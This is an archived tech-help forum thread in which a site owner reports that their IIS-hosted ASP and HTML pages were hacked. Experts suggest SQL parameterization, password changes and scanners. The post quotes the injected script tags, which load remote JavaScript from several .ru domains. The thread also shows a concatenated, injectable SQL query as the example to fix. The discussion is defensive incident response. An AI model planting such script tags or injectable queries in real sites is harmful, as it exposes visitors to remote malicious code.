Solved

regarding IIS server hack

Posted on 2008-10-29
4
577 Views
Last Modified: 2013-12-04
Hi,

We have Verio/Ntt Windows shared Hosting Plans and we configure our imp. client on their, this is Global client website, this way some of hackers always try to hack this website, this website also connect with SQL server 2005 database,
But presently hacker are able to hack the static and dynamic pages (.asp and .html), We have found that the following script in our web pages,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I got the following links which is related   the website hack issue
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also sql server to know that how hacker hack our website and also how I can secure our server

Regards,
Naresh
0
Comment
Question by:sitg
  • 2
4 Comments
 
LVL 32

Expert Comment

by:Daniel Wilson
Comment Utility
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
LVL 2

Expert Comment

by:devshb
Comment Utility
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

ie click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first. eg change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to effect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
 
LVL 2

Expert Comment

by:devshb
Comment Utility
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 

Accepted Solution

by:
sitg earned 0 total points
Comment Utility
I have run the Acunetix Web Vulnerability Scanner and resolve this issue,
lots of web pages having sql injection issue.

Regards,
Naresh
0

Featured Post

Free camera licenses with purchase of My Cloud NAS

Milestone Arcus software is compatible with thousands of industry-leading cameras for added flexibility. Upon installation on your My Cloud NAS, you will receive two (2) camera licenses already enabled in the software. And for a limited time, get additional camera licenses FREE.

Join & Write a Comment

In this article I will describe the Copy Database Wizard method as one possible migration process and I will add the extra tasks needed for an upgrade when and where is applied so it will cover all.
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.
When you create an app prototype with Adobe XD, you can insert system screens -- sharing or Control Center, for example -- with just a few clicks. This video shows you how. You can take the full course on Experts Exchange at http://bit.ly/XDcourse.

744 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

17 Experts available now in Live!

Get 1:1 Help Now